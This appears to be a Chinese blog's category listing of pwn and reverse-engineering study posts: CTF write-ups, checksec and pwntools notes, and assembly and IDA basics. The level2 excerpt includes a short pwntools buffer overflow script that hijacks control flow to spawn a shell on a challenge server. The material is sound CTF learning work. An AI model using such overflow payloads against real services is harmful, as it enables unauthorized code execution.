![](https://img-blog.csdnimg.cn/20201014180756757.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
PWN
文章平均质量分 88
RICKC131
Stay hungry, stay foolish.
展开
-
攻防世界hello _pwn总结
checksec转自:checksec工具使用-pwn – 简书 (jianshu.com)基本用法:checksec –file=hello_pwnArch:系统架构信息,判断是64位还是32位,选择相应的IDA和写相应的exp。amd64-64-little说明为64位,选用64位的IDA,写64位的exp。RELRO:Relocation Read-Only (RELRO),此项技术针对GOT/GIFTO(区块链)改写的攻击方式。分为两种,Partial RELRO 和 Full RE原创 2021-11-13 02:01:17 · 4551 阅读 · 0 评论 -
攻防世界PWN hello_pwn
1先下载文件放到kali里用checksec看一下(是用来检查可执行文件开启的各种安全机制的一个脚本软件)checksec安装.得到的信息:64位的文件,canary未开启canary介绍与绕过技巧2用IDA打开,点击main,鼠标点击窗口内,按F5分析代码read(0, &unk_601068, 0x10uLL); 读取数据if ( dword_60106C == 1853186401 ) 判断值是否相等双击“sub_400686();”可以看到由此可以看出当原创 2021-09-28 19:04:08 · 1562 阅读 · 0 评论 -
攻防世界_leve0
checksec有点不大明白,之前checksec直接checksec filename就可以,现在变了样,索性就再记一记(参考checksec安装与使用)这个里面结尾有点意思:pwn题到手,checksec一下,file一下,nc一下,IDA一下sudo apt install checksec我用的是kali2022.1+阿里源,没有任何毛病之前一直是这样用的,现在试了不行,就查了下checksec使用好像提示也够明显哈类型一 normal (or --format=cli)che原创 2022-03-06 15:21:04 · 4469 阅读 · 0 评论 -
攻防世界_level2
checksecIDAexpfrom pwn import *p = remote('111.200.241.244',58154)payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024)p.recvuntil("Input:")p.send(payload)p.interactive()运行得到flag原创 2022-04-10 14:17:54 · 4274 阅读 · 0 评论 -
Pwntools_Study
pwntools中文文档Pwntools | Lantern’s 小站 ,这篇文章也是参考了另一篇 pwntools使用 | 简书 ch3ckr本文结合两篇,再加一点自己的见解安装ubuntu python3 pip3sudo apt install libssl-devsudo apt install libffi-devpip install pwntools简单使用虽是简单使用,但对于还是菜鸟的我,还是十分受用的。导入from pwn import *使用 from p原创 2022-04-17 01:07:05 · 322 阅读 · 0 评论 -
汇编语言(王爽)第四版学习1
第一章机器语言:0,1简单语句:mov ax,bx汇编语言组成:(1)汇编指令:机器码的助记符,有对应的机器码(2)伪指令:没有对应的机器码,由编译器执行,计算机并不执行(3)其他符号:如+、 -、*、/等,由编译器识别,没有对应的机器码存储器:内存指令和数据:指令和数据是应用上的概念,CPU工作时有点信息看作指令,有的信息看作数据1000100111011000–>89D8H(数据)100010011011000–>move ax,bx(程序/指令)存储单元:最小单位原创 2021-09-03 19:42:30 · 593 阅读 · 0 评论 -
反汇编基础学习(四)
title: IDAstudy_4DIA数据显示窗口在将文件加载到IDA中完成初步分析后,需要手动分析。锁业需要对IDA用户界面有充分的了解。IDA用户界面的基本规则:**IDA不提供撤销功能:**意外操作需要手动恢复到上一步**几乎所有操作都有其对应的菜单项,热键和工具栏按钮:**可以根据需要自定义显示哪些按钮,或增加哪些按钮**IDA提供方便的、基于上写下文的鼠标右键操作菜单:**可以用来执行一些常见操作IDA主要的数据显示窗口默认情况下会对文件的初始加载分析阶段创建七个显示窗口,包.原创 2022-01-24 21:52:01 · 2261 阅读 · 0 评论 -
反汇编基础学习(三)
IDA Pro简介交互式反汇编专业版(Interactive Disassembler Professional),即 IDAPro,是比利时Hex-Rays公司的一款产品,开发者为Ilfak Guilfanov。本质是一种递归下降反汇编器,刚诞生时只是一个基于控制台的MS-DOS应用。MS-DOS(Microsoft-Disk Operating System),是微软的磁盘操作系统,是DOS的一个分支。MS-DOS的来历可以查阅一下资料,最早的DOS称为86-DOS,最后由微软创始人比尔?盖茨以5原创 2021-12-15 00:03:39 · 994 阅读 · 0 评论 -
反汇编基础学习(二)
逆向与汇编工具一些用于逆向工程的老工具,IDA已经将这些工具的功能整合到它的用户几面中。分类工具分辨一个文件时 “文件扩展名并无实际意义”filefile命令是一个标准的实用工具,大多数*NIX分割的操作风格的操作系统和windows下的Cygwin或MinGw工具都带有这个实用工具。Cygwin是运行于Windows平台的POSIX“子系统”,提供Windows下的类Unix环境,并提供将部分 Linux 应用“移植”到Windows平台的开发环境的一套软件。MinGw 是用于进行 Wind原创 2021-12-07 11:29:23 · 2948 阅读 · 0 评论 -
反汇编基础学习(一)
参考教材:《IDA Pro权威指南》(第2版)编程语言第一代语言:0和1,十六进制码,也称为机器语言,字节码,机器语言程序常被称为二进制文件第二代语言:汇编语言,助记符对应具体模式的位模式或操作码第三代语言:引入了关键字和结构,表达更接近自然语言,常见的C,Java,C++ 需要编译器转换为汇编语言或机器语言第四代语言:用户定义“做什么”而不是“如何做”,依靠更高级的第四代工具,SQL,QBE反汇编和反编译概念为了回溯编程过程(或对程序进行逆向工程)使用各种反汇编工具撤销汇编和编译过程,原创 2021-11-30 13:01:45 · 7450 阅读 · 0 评论